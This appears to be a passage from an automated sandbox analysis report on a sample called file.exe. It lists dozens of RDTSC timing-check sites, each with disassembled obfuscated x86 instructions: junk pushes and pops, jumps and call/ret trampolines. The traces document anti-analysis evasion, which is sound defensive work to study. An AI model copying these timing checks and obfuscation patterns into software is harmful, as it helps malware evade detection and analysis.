    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3708A6 second address: 3708AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3743A8 second address: 3743EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F18F0E36A54h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F18F0E36A53h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F18F0E36A4Dh 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3743EA second address: 3743EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3743EF second address: 3743F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3743F5 second address: 374496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F18F0EA3E4Ch 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007F18F0EA3E4Fh 0x00000017 pop eax 0x00000018 mov esi, dword ptr [ebp+122D3AB4h] 0x0000001e push 00000003h 0x00000020 sub di, F310h 0x00000025 mov dl, E6h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007F18F0EA3E48h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 push 00000003h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007F18F0EA3E48h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov si, E06Fh 0x00000063 call 00007F18F0EA3E49h 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F18F0EA3E52h 0x0000006f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 374496 second address: 3744F1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F18F0E36A48h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e jmp 00007F18F0E36A51h 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jl 00007F18F0E36A52h 0x0000001e jnc 00007F18F0E36A4Ch 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 push edi 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a pop edi 0x0000002b jns 00007F18F0E36A48h 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 pushad 0x00000037 jc 00007F18F0E36A4Ch 0x0000003d jo 00007F18F0E36A46h 0x00000043 push eax 0x00000044 push edx 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 374603 second address: 3746B7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F18F0EA3E48h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F18F0EA3E54h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jo 00007F18F0EA3E4Eh 0x0000001d jp 00007F18F0EA3E48h 0x00000023 pushad 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 jo 00007F18F0EA3E52h 0x0000002d jo 00007F18F0EA3E4Ch 0x00000033 js 00007F18F0EA3E46h 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d jnp 00007F18F0EA3E63h 0x00000043 pop eax 0x00000044 mov dx, F140h 0x00000048 push 00000003h 0x0000004a mov edi, dword ptr [ebp+122D1DCBh] 0x00000050 push 00000000h 0x00000052 sbb ecx, 7C0E04AEh 0x00000058 push 00000003h 0x0000005a push 00000000h 0x0000005c push ebp 0x0000005d call 00007F18F0EA3E48h 0x00000062 pop ebp 0x00000063 mov dword ptr [esp+04h], ebp 0x00000067 add dword ptr [esp+04h], 00000017h 0x0000006f inc ebp 0x00000070 push ebp 0x00000071 ret 0x00000072 pop ebp 0x00000073 ret 0x00000074 mov dword ptr [ebp+122D1C71h], ebx 0x0000007a push 7CF0980Ah 0x0000007f push esi 0x00000080 push eax 0x00000081 push edx 0x00000082 push ecx 0x00000083 pop ecx 0x00000084 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3746B7 second address: 374706 instructions: 0x00000000 rdtsc 0x00000002 je 00007F18F0E36A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 430F67F6h 0x00000012 jmp 00007F18F0E36A57h 0x00000017 lea ebx, dword ptr [ebp+12454212h] 0x0000001d mov dword ptr [ebp+122D1DF9h], ecx 0x00000023 push eax 0x00000024 pushad 0x00000025 pushad 0x00000026 jmp 00007F18F0E36A51h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d popad 0x0000002e push edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37478F second address: 3747C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b and ecx, 79970CBEh 0x00000011 mov dword ptr [ebp+122D1C8Bh], ecx 0x00000017 push 00000000h 0x00000019 mov ch, 14h 0x0000001b jmp 00007F18F0EA3E4Dh 0x00000020 push CE4E5AF9h 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 374887 second address: 3748AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0E36A50h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F18F0E36A51h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392B1A second address: 392B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392B1E second address: 392B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F18F0E36A55h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F18F0E36A4Eh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392B47 second address: 392B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E50h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392CC5 second address: 392CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392CC9 second address: 392CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F18F0EA3E50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392FBE second address: 392FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jc 00007F18F0E36A46h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392FCE second address: 392FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3930FD second address: 393101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 393101 second address: 39310C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39310C second address: 393114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39379C second address: 3937A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3937A0 second address: 3937B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3937B9 second address: 3937D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E59h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3942F8 second address: 3942FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 394A1D second address: 394A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 394A21 second address: 394A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F18F0E36A46h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 394A36 second address: 394A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 397F9A second address: 397FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39A352 second address: 39A378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jng 00007F18F0EA3E46h 0x00000014 pop esi 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39A378 second address: 39A37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 398CE5 second address: 398CEF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F18F0EA3E4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39FAAF second address: 39FAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jl 00007F18F0E36A5Ch 0x00000014 jmp 00007F18F0E36A54h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39F085 second address: 39F0D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F18F0EA3E46h 0x00000009 jmp 00007F18F0EA3E51h 0x0000000e jmp 00007F18F0EA3E50h 0x00000013 popad 0x00000014 jmp 00007F18F0EA3E4Ch 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e push esi 0x0000001f pop esi 0x00000020 jmp 00007F18F0EA3E52h 0x00000025 pop ebx 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39F631 second address: 39F637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39F637 second address: 39F63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39F63B second address: 39F658 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F18F0E36A4Bh 0x0000000e jg 00007F18F0E36A46h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A22A6 second address: 3A22AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A22AA second address: 3A22D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007F18F0E36A46h 0x00000010 jmp 00007F18F0E36A4Eh 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A2702 second address: 3A2717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F18F0EA3E54h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A2717 second address: 3A271B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A28CE second address: 3A28D8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F18F0EA3E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A339A second address: 3A33A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A351F second address: 3A3531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F18F0EA3E50h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3648 second address: 3A3652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F18F0E36A46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3652 second address: 3A3656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3BB5 second address: 3A3BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3BBB second address: 3A3BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3BBF second address: 3A3BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A448C second address: 3A449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jbe 00007F18F0EA3E46h 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5FDB second address: 3A5FE8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F18F0E36A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A7F54 second address: 3A7F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5D51 second address: 3A5D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9230 second address: 3A9234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AAA3C second address: 3AAA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F18F0E36A4Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5D57 second address: 3A5D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AAA54 second address: 3AAA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AC047 second address: 3AC0E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F18F0EA3E48h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push ecx 0x00000025 add dword ptr [ebp+122DB915h], esi 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F18F0EA3E48h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a jmp 00007F18F0EA3E53h 0x0000004f sub dword ptr [ebp+1245E28Eh], edx 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 jmp 00007F18F0EA3E59h 0x0000005e pop edi 0x0000005f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AC0E1 second address: 3AC0F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AC0F9 second address: 3AC0FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD046 second address: 3AD04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE0B4 second address: 3AE0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD18B second address: 3AD18F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE0B8 second address: 3AE0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jng 00007F18F0EA3E46h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD18F second address: 3AD1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F18F0E36A4Ch 0x00000010 jg 00007F18F0E36A46h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE0CC second address: 3AE0D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE0D2 second address: 3AE0D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE0D6 second address: 3AE137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b mov edi, dword ptr [ebp+122D22F5h] 0x00000011 mov di, 1620h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F18F0EA3E48h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 pushad 0x00000034 ja 00007F18F0EA3E46h 0x0000003a jmp 00007F18F0EA3E4Ah 0x0000003f popad 0x00000040 jmp 00007F18F0EA3E4Ah 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jne 00007F18F0EA3E46h 0x00000050 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF130 second address: 3AF134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE3C4 second address: 3AE3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F18F0EA3E5Bh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF134 second address: 3AF1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ebx 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F18F0E36A48h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov di, 5BDDh 0x0000002a push 00000000h 0x0000002c movzx edi, ax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F18F0E36A48h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b sbb ebx, 60F45061h 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jmp 00007F18F0E36A52h 0x0000005a jmp 00007F18F0E36A54h 0x0000005f popad 0x00000060 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF351 second address: 3AF356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF356 second address: 3AF35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B2209 second address: 3B220E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B131B second address: 3B132D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F18F0E36A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F18F0E36A46h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B220E second address: 3B228B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0EA3E4Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jg 00007F18F0EA3E49h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F18F0EA3E48h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr [ebp+124781EEh], ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007F18F0EA3E48h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 cmc 0x00000054 mov edi, ebx 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F18F0EA3E4Eh 0x0000005e rdtsc
